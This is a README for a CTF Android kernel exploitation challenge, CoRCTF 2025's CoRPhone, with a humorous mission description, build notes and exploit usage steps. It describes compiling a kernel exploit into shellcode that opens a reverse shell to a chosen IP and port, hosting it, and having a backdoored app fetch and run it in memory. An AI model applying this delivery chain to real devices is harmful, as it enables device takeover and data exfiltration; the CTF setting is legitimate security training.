CoRCTF 2025 - CoRPhone: Android Kernel Pwn

0xdevil/corphone


CoRPhone is an Android kernel exploitation challenge created for CoRCTF 2025. It simulates a scenario in which a kernel exploit is delivered as shellcode and executed in memory by an untrusted Android app.

Congratulations to Pumpkin (@u1f383) and Billy (@st424204) for the first and only solve!

Description

John "Piccio" Paniccia is the world's most notorious pigeon trafficker.
His most prized asset is a rare albino pigeon named Artura, insured for $1,000,000.

Intelligence indicates that Paniccia plans to sell Artura within 48 hours. 
The Agency has successfully installed a backdoor on his smartphone, but we have hit a brick wall: 
the trafficker uses a CoRPhone Pro - the most secure mobile platform on the planet.

You are our last resort. Your mission is to fully compromise the device, gain kernel-level access,
exfiltrate the chat history, and locate the albino pigeon before it's too late.

Build and run

Download the challenge archive from here and follow the instructions to build the Docker image and create a CoRPhone instance.

Additional files:

  • vmlinux.tar.gz - Android kernel with debug symbols.

  • debug-image.tar.gz - Optional Linux debug image to speed up initial vulnerability analysis and the early stages of exploit development. The kernel and system image differ from Android, so make sure your exploit works on the target device.

Writeup

TBD. A TL;DR is provided in exploit.c.

Exploit

Compile the exploit with cd exploit && ./build.sh <IP> <PORT>.

IP and PORT are the address and port where you want to receive the reverse shell connection.

The script compiles the binary using musl-gcc, converts the resulting ELF to shellcode using pwntools, and creates a file called sc.

Host this file on your server and download it from the backdoored app using: pwn https://<yourserver>/sc. The app will execute the shellcode in memory through JNI.
